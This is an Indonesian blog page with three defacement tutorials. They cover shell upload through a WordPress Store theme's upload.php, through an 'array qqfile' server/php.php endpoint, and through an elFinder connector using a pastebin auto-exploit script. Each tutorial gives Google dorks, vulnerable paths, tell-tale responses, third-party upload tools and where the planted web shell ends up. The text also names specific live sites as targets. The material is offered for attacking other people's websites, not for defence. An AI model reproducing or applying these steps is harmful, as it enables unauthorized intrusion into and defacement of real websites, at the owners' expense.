Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Selasa, 30 Januari 2018

Cara Deface Dengan Exploit Wordpress Store Shell Upload

Tutorial Deface With Exploit Wordpress Store Shell Upload


 

Hai gan ketemu lagi dengan saya  kumpul berbagi, yang sudah lama tidak  update wkwkwkwk tapi kali ini saya akan update setiap hari  karena ada sesuatu yang ada di blog ini   jadi kali ini mau share Cara Deface Dengan Exploit Wordpress Store Shell Upload  , ok langsung saja ke tutorialnya ...
Pertama pertama dorking dulu dengan dork 
inurl:uploads/products_img/ 

setelah dorking kita CTRL+U di websitenya untkuk cek themes yang dipake,
untuk exploitnya
/upload/upload.php
jadi kaya gini nih gan
http://www.demain-ingenieur.fr/wp-content/themes/demainingenieur/upload/upload.php
Kalo vuln blank 
live target
www.deybras.com/
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
kita copy alamatnya /url
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
setelah copy kita masuk ke csrf online bisa kamu pakai  kalian kunjungi dissini
http://sgmarketing.com.pl/nitip.php

ok langsung saja ke exploinya kita copy urlnya
isikan target dengan url yang tadi
postname ini myfile
setelah itu upload shell
suksess blank
letak shell di
http://target.com/wp-content/uploads/products_img/namashell.php
shell udah ke upload sekian tutorial dari saya
jangan lupa Share  Cara Deface Dengan Exploit Wordpress Store Shell Upload
Thanks to all member defacer indonesia :*
Jika kurang jelas bisa tonton videonya disin.  atau disini https://www.youtube.com/watch?v=xBeVii3zXPg

Tutorial deface dengan array qqfile shell upload

Hello ^^ kali ini saya akan share Tutorial deface with array qqfile shell upload 2017.
yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
inurl:server/uploads kembangin lagi ya :v




setelah mendapatkan targetnya kita exploit dengan /server/php.php
jadi seperti ini http://target.com/path/server/php.php
kalo vuln akan muncul tulisan seperti ini


{"error":"No files were uploaded."}

atau seperti gambar dibawah ini






sekarang kita eksekusi targetnya dengan tools csrf online
untuk csrf online disini
http://www.sgmarketing.com.pl/nitip.php

setelah itu kita copy targetnya dan pastekan di csrf online
dan postfile isi dengan qqfile
dan klik kunci target
dan upload shell


jika bingung bisa lihat gambar dibawah ini







bila suksess upload shell muncul tulisan seperti ini
{"success":true}

untuk letak shellnya di http://target.com/path/server/upoads/namashell.php




Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=I62lF1oFlMs

Mungkin sekian dulu  dari saya mengenai artikel Tutorial deface dengan array qqfile shell upload semoga bermanfaat.

Cara Deface Dengan Auto Exploit Elfinder

Hello ^^ kali ini saya akan share Cara Deface Dengan Auto Exploit Elfinder
sembelum ke tutorialnya saya berterimakasih kepada Tu5b0l3d dan indoxploit yang bikin toolsnya xD .

yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
Dork = inurl:elfinder/files

setelah mendapatkan targetnya kita exploit dengan /php/connector.php
jadi seperti ini http://target.com/path/elfinder/php/connector.php
kalo vuln akan muncul tulisan seperti ini

{"error":["errUnknownCmd"]}

atau lihat gambar seperti dibawah ini





sekarang kita eksekusi dengan tools auto exploitnya
untuk script auto exploitnya disini
https://pastebin.com/S7Y2V19h

buka cmd dan masukan perintah php namafile.php http://target.com/path/elfinder/php/connector.php
maka hasilnya seperti ini

dan terakhir langsung upload shell lagi di
http://target.com/elfinder/files/k.php

terus buka shellnya di http://target.com/elfinder/files/namashellmu.php



Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=ZxHd243-cYo

Mungkin sekian dulu  dari saya mengenai artikel Cara Deface Dengan Auto Exploit Elfinder semoga bermanfaat